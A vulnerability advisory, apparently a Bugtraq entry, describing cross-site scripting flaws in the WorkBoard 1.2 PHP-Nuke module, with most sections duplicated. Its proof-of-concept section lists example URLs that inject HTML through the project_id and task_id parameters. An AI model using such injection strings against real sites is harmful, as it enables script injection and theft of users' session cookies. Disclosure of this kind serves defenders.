WorkBoard PHP-Nuke Module Multiple Cross-Site Scripting Vulnerabilities
BID:12054
Info
WorkBoard PHP-Nuke Module Multiple Cross-Site Scripting Vulnerabilities
| Bugtraq ID: | 12054 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 20 2004 12:00AM |
| Updated: | Dec 20 2004 12:00AM |
| Credit: | Discovery of these vulnerabilities is credited to Lostmon. |
| Vulnerable: |
Burnwave, LTD WorkBoard 1.2 |
| Not Vulnerable: | |
Discussion
WorkBoard PHP-Nuke Module Multiple Cross-Site Scripting Vulnerabilities
It is reported that WorkBoard is affected by various cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input.
These issues could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If this link were to be followed, the hostile code may be rendered in the web browser of the victim user. This would occur in the security context of the affected web site and may allow for theft of cookie-based authentication credentials
It is reported that WorkBoard is affected by various cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input.
These issues could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If this link were to be followed, the hostile code may be rendered in the web browser of the victim user. This would occur in the security context of the affected web site and may allow for theft of cookie-based authentication credentials
Exploit / POC
WorkBoard PHP-Nuke Module Multiple Cross-Site Scripting Vulnerabilities
The following examples are available:
http://www.example.com/modules.php?name=WorkBoard&file=project&project_id=3[XSS_code]
http://www.example.com/modules.php?name=WorkBoard&file=project&project_id=2%3Cbody%3E%3Cp%3E%3Ch1%3EWorkboard+XSS%20Pow@!!+%21%21%21+lostmon+was+here+%3AD%3C/h1%3E
http://www.example.com/modules.php?name=Work_Board&op=Task&task_id=7[XSS_code]
http://www.example.com/modules.php?name=Work_Board&op=Task&task_id=5%3Cbody%3E%3Cp%3E%3Ch1%3EWorkboard+XSS%20Pow@!!+%21%21%21+lostmon+was+here+%3AD%3C/h1%3E
The following examples are available:
http://www.example.com/modules.php?name=WorkBoard&file=project&project_id=3[XSS_code]
http://www.example.com/modules.php?name=WorkBoard&file=project&project_id=2%3Cbody%3E%3Cp%3E%3Ch1%3EWorkboard+XSS%20Pow@!!+%21%21%21+lostmon+was+here+%3AD%3C/h1%3E
http://www.example.com/modules.php?name=Work_Board&op=Task&task_id=7[XSS_code]
http://www.example.com/modules.php?name=Work_Board&op=Task&task_id=5%3Cbody%3E%3Cp%3E%3Ch1%3EWorkboard+XSS%20Pow@!!+%21%21%21+lostmon+was+here+%3AD%3C/h1%3E
Solution / Fix
WorkBoard PHP-Nuke Module Multiple Cross-Site Scripting Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
WorkBoard PHP-Nuke Module Multiple Cross-Site Scripting Vulnerabilities
References:
References:
- Workboard input validation error in task_id variable and proyect_id variable (Lostmon)
- WorkBoard Homepage (Burnwave, Ltd.)